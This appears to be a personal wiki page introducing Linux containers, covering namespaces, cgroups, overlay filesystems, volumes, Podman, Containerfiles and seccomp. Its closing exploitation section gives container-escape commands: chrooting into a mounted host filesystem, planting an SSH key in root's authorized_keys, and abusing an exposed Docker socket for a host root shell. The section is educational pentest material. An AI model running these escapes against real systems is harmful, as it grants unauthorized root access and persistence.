Containers

What's a Container?

It's like a pre-configured VM that comes installed with whatever software you want. The difference is that instead of being a fully-virtualized OS, it shares the host's kernel and resources and runs only a limited set of software. As a result, containers are much more lightweight than a full VM.

For a more intelligent explanation, see the Arch Wiki's page on Linux Containers.

As for their utility versus installing into the core OS or building from source, there are a couple of scenarios I've found containers to be useful for.

First, containers can guarantee consistency in the final product. Let's say you want to use nmap, but you keep getting errors from scripts because you haven't quite set everything up right, or the dependencies are slightly off and some shared libraries are causing breakage. Just run nmap as a container and you'll have a setup that's always blessed by the developers (or the container's maintainer, if it's a separate project).
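As a sketch of that workflow (instrumentisto/nmap is a community-maintained image on Docker Hub, used here purely as an example - substitute whatever image you trust):

```shell
# run nmap from a pre-built image instead of installing it locally;
# --rm deletes the container as soon as the scan finishes
podman run --rm docker.io/instrumentisto/nmap -sV scanme.nmap.org
```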

Second, containers can massively reduce the time it takes to install and configure software, especially for more complex installations. One use case is spinning up an instance of Oracle DB in order to practice pentesting, test some code, etc. Installing with an RPM can leave you with a lot of junk on your system, which isn't really awesome when you just want a quick testbed. Instead of stepping through the installation process, you can run the magic command:

podman run -d \
  --name oracle-db \
  -p 1521:1521 \
  -e ORACLE_PWD=root \
  container-registry.oracle.com/database/free:latest

And you'll have Oracle DB running locally in just a couple of minutes. When you're done with the image, it's similarly simple to purge all artifacts.
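For example, tearing everything down again is just a few commands (assuming the container and image names from the run above):

```shell
# stop and delete the container, then delete the image it came from -
# no leftover RPM junk on the host
podman stop oracle-db
podman rm oracle-db
podman rmi container-registry.oracle.com/database/free:latest
```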

Alternatively, this is useful for cases where you generally have to rebuild software from scratch in order to deploy it (read: you're in a corporate environment). Let's take redis (an in-memory NoSQL DB) as an example. If you want to install redis with five of the most popular modules, you need to script out the installation steps not just for redis core, but for each and every one of the five modules. Now imagine that you want to upgrade - you need to double-check the steps again at minimum, alongside the usual sanity checks.

Orrrr, instead of all of that nonsense, you can just pull the pre-built container image and run that.
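As a hedged example: Redis publishes a pre-built image, redis/redis-stack, that bundles the core server with the popular modules, so the whole "build six components from source" dance collapses to one command:

```shell
# run Redis plus its bundled modules in one step;
# upgrading later is just pulling a newer tag and re-running
podman run -d --name redis -p 6379:6379 docker.io/redis/redis-stack:latest
```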

Side note: these two benefits are what make containers very popular for software development. No longer do you need a long setup guide for a local development environment with endless possibilities to screw up! With a good setup, it can become as easy as running a handful of simple commands.

What Goes Into a Container?

Namespaces

Containers are isolated from the core OS with the use of something called namespaces. A chroot can be thought of as a filesystem namespace of sorts, and the idea can be extended to:

  • Host and domain name (UTS, short for UNIX Time-Sharing)
  • PID
  • Network
  • Mounts
  • IPC
  • Users
  • Time
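You can play with namespaces directly using the unshare utility from util-linux. A minimal sketch of the UTS namespace (requires root, or a system with unprivileged user namespaces enabled):

```shell
# give a child process its own hostname without affecting the host;
# --uts creates a new UTS namespace for the command that follows
sudo unshare --uts sh -c 'hostname container-demo; hostname'

# back in the parent namespace, the real hostname is untouched
hostname
```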

Control Groups (cgroups)

Control groups are used to limit the resources used by a process, and are obviously useful for containers as well, considering they could host resource-intensive applications.
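Container runtimes expose cgroup limits as plain flags, so you rarely touch the cgroup filesystem yourself. A sketch with Podman (the flags are real; alpine is just an example image):

```shell
# cap the container at half a CPU core and 256 MiB of RAM;
# the runtime translates these flags into cgroup settings for you
podman run --rm --cpus=0.5 --memory=256m docker.io/library/alpine \
  sh -c 'cat /sys/fs/cgroup/memory.max'
```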

Overlay Filesystem

If you've ever tried to upgrade a container to the latest version, you probably noticed that it's fairly quick and doesn't involve re-downloading the entire image. How could that possibly be?

TL;DR: it's a filesystem built from static, incremental changes, much like commits in git.

This is achieved with something called an overlay filesystem. Essentially, you start with a base filesystem layer that is immutable, even though it doesn't appear that way. When you make changes to the filesystem, you're actually writing to an upper layer that is writable and tracks whatever changes you've made. When you commit those changes, a new read-only filesystem layer is created with your changes and just your changes. The end result is a filesystem with all the changes applied on top of each other.

So when you pull a container image again to upgrade it, you're actually pulling the latest filesystem layers that have been added and then applying them on top of the prior base.
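You can build a toy overlay by hand with mount(8) to see the mechanism outside of any container runtime (the directory names here are arbitrary; requires root):

```shell
# lower = read-only base layer, upper = writable layer,
# work = scratch space that overlayfs needs internally
mkdir -p lower upper work merged
echo 'base content' > lower/file.txt

sudo mount -t overlay overlay \
  -o lowerdir=lower,upperdir=upper,workdir=work merged

# writes to the merged view land in upper/, leaving lower/ untouched
echo 'modified' > merged/file.txt
cat lower/file.txt   # still "base content"
cat upper/file.txt   # "modified"
```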

Along these lines, we can derive some other more minor ideas:

  • You can't modify the base image simply by changing data at runtime. Those modifications are ephemeral and will disappear once the container is stopped.
  • If two images have the same base in common, e.g. RHEL 8.x, the container runtime can utilize caching to avoid pulling down the same filesystem layers over and over again.

Volumes/Bind Mounts

If container filesystems are immutable, then how can we use persistent data? To do this, you use something called a volume, which links a directory on your host to the container. At the most basic level, the underlying mechanism is something called a bind mount. If you're familiar with symbolic links, a bind mount is basically a symlink at the filesystem level.

TIP

Volumes don't have to be a bind mount. Check the Docker documentation to learn more about some other (Docker-specific) possibilities.
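A minimal bind-mount sketch with Podman (the -v flag maps a host path to a container path; the :Z suffix relabels the directory for SELinux hosts and can be dropped elsewhere):

```shell
# persist data by mapping a host directory into the container
mkdir -p ./webroot
echo 'hello from the host' > ./webroot/index.html

# the official httpd image serves from /usr/local/apache2/htdocs
podman run -d --name web -p 8080:80 \
  -v ./webroot:/usr/local/apache2/htdocs:Z \
  docker.io/library/httpd:latest

curl http://localhost:8080/   # serves the file straight from ./webroot
```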

Networking

TODO

Write this.

Container Runtimes

There are many tools that allow you to run containers. The most common one is of course Docker, and Podman is another popular alternative. Some other runtimes include:

  • runc
    • Docker builds on top of this one
  • LXC and LXD
  • OpenVZ
  • rkt

Opinion Time!

Which one should you use? I'd recommend Podman for the following reasons:

  1. It's more free!
  2. It creates and manages containers like you'd expect as a beginner.
  3. It has the concept of "pods" for running multiple containers in a group. Hint: this concept will come in handy for Kubernetes.

Containerfiles

In order to create a container from scratch, you need to write something called a Containerfile (if you're using Docker, you can also call this a Dockerfile). Here you specify the base image, a set of commands to run for your desired setup, the default entrypoint and arguments, etc.

For a simple example, here's a container that starts a webserver with httpd:

FROM rockylinux:8-minimal
# the -minimal image ships microdnf rather than full yum/dnf
RUN microdnf -y install httpd
EXPOSE 80/tcp
ENTRYPOINT ["/usr/sbin/httpd"]
CMD ["-D", "FOREGROUND"]
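Building and running it then looks like this (the image name my-httpd is arbitrary):

```shell
# build an image from the Containerfile in the current directory
podman build -t my-httpd .

# run it detached, mapping host port 8080 to the container's port 80
podman run -d --name web -p 8080:80 my-httpd
curl http://localhost:8080/
```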

Container Registries

These are like the package repositories used by Linux distributions: they just host container images for people to download and run.

There are a number of container registries out there, but the most common is probably Docker Hub.
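Pulling from a registry is baked into the run workflow, but you can also do it explicitly. With Podman, image references can carry the registry hostname (docker.io here):

```shell
# fetch an image without running it, then list what's cached locally
podman pull docker.io/library/alpine:latest
podman images
```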

Container Security

seccomp

Containers share resources with the host OS, including the kernel. How can we restrict kernel-level interactions with the host?

Containers can utilize seccomp security profiles, a Linux kernel feature, in order to restrict the syscalls that a container can make. Specifically, a profile is a whitelist of the syscalls that your container is allowed to make. This is useful for running containers while still following the principle of least privilege.

Seccomp is enabled by default in Docker and Podman, and the default whitelist is a pretty sane starting point out of the box. However, the seccomp profile can be tuned to your needs as required.
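To run with a custom profile, point the runtime at a profile JSON via --security-opt (the flag syntax below is the real Docker/Podman one; the contents of profile.json are up to you):

```shell
# apply a custom seccomp profile from ./profile.json;
# syscalls not whitelisted in the profile will be denied
podman run --rm --security-opt seccomp=./profile.json \
  docker.io/library/alpine sh -c 'echo still allowed'

# seccomp can also be disabled entirely (don't do this in production):
podman run --rm --security-opt seccomp=unconfined \
  docker.io/library/alpine true
```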

For more information, see the documentation on seccomp from Docker and the Linux kernel.

Privileged Containers

TODO

Write this.

Auditing Containers

TODO

Write this.

Exploitation

Disclaimer

This section will be short to begin with, but will evolve over time.

Insecure Volumes

When creating volumes, you need to be mindful of what you include.

If a container has the entire host filesystem mounted inside the container, then exploitation is generally going to be pretty trivial. Add a user to /etc/passwd, plant a backdoor SSH key, etc. Pick your favorite method, escalating privileges if needed.

Also search for credentials to other services - they can provide a pivot point.
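As a sketch of why a full-filesystem mount is game over (assuming the host's root is mounted at /host inside the container, and you're root in the container):

```shell
# from inside the container: chroot into the host's filesystem and
# you're effectively operating as root on the host
chroot /host /bin/bash

# or skip the shell and plant persistence directly, e.g. an SSH key
# (attacker_key.pub is a hypothetical key you brought along):
cat /tmp/attacker_key.pub >> /host/root/.ssh/authorized_keys
```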

Exposed Docker Socket

Docker creates containers a bit differently. Instead of just, ya know, creating a container directly, the docker binary communicates with a management socket to manage containers. This can be useful when you're deploying a new version of your app's container, but if the socket is mounted inside the container, there's a unique exploitation vector.

If the Docker socket is present in the container, you can just create a new container that does whatever you want. Get creative.
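For example, from inside a container with /var/run/docker.sock mounted (and a docker client available), you can ask the daemon - which runs on the host - to start a new container on your terms:

```shell
# talk to the host's Docker daemon through the mounted socket and
# launch a container with the host's root filesystem bind-mounted,
# then chroot into it for a root shell on the host
docker -H unix:///var/run/docker.sock run -it --rm \
  -v /:/host docker.io/library/alpine chroot /host sh
```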
